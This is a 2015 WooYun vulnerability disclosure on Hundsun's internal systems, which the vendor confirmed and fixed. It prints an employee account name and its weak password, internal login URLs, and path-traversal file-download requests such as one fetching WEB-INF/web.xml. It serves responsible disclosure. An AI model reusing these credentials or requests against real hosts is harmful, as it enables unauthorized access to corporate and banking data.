当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154536

漏洞标题:恒生电子账户体系控制不严导致多个项目泄露(包括金融和银行项目\已登录多个系统)

相关厂商:hundsun.com

漏洞作者: 默之

提交时间:2015-11-20 13:47

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

内部账号弱口令,权限还是比较大的

详细说明:

https://mail.hundsun.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.hundsun.com%2fowa%2f


rengq10414/123qwe!@#


这个账号貌似是一个项目经理的,目前设计的项目还是比较多的
现在正在做的充值宝

充值宝.png


充值宝的log

充值宝2.png


民生银行

民生银行.png


民生.png


工资宝

工资宝.png


陆金所

陆金所.png


正做做的系统改进

正在做的系统.png


四个合同

四个合同.png


漏洞证明:

使用这个账号可以登录多个系统

https://synergy.hundsun.com/login/Login.jsp?logintype=1 OA
https://ts.hundsun.com/se/portal/SupportPortal.htm技术支持
https://pm.hundsun.com/main.do青铜器
http://kfhsitsm.hundsun.com/kfhsitsm/main.action客服系统


OA

oa.png


客服系统

客服.png


技术支持

技术支持.png


青铜器

青铜器.png


其中在青铜器和技术支持两个系统中都存在任意文件下载的漏洞
先上传一个文件,观察生成的url

https://ts.hundsun.com/se/fileservice/FileDownload.htm?fileURL=20080088//2015-11-20/20151120132051517368120513193996.jspx&savePath=testhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/files/&fileName=mysql.jspx


http://kfhsitsm.hundsun.com/kfhsitsm/download.action?type=task&fileTempName=../../../WEB-INF/web.xml


下载的文件.png


下载文件1.png

修复方案:

弱口令
内部系统修复

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-24 18:32

厂商回复:

非常感谢您的反馈,已进行处理。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-20 13:51 | 故滨 ( 普通白帽子 | Rank:311 漏洞数:40 )

    @默之 你是盯上恒生了

  2. 2015-11-20 13:57 | 默之 ( 普通白帽子 | Rank:909 漏洞数:159 | 沉淀。)

    @故滨 最后一发了^_^

  3. 2015-11-20 14:28 | 追寻 ( 普通白帽子 | Rank:136 漏洞数:32 | 行万里路,才能回到内心深处!)

    @默之 专注恒生30年么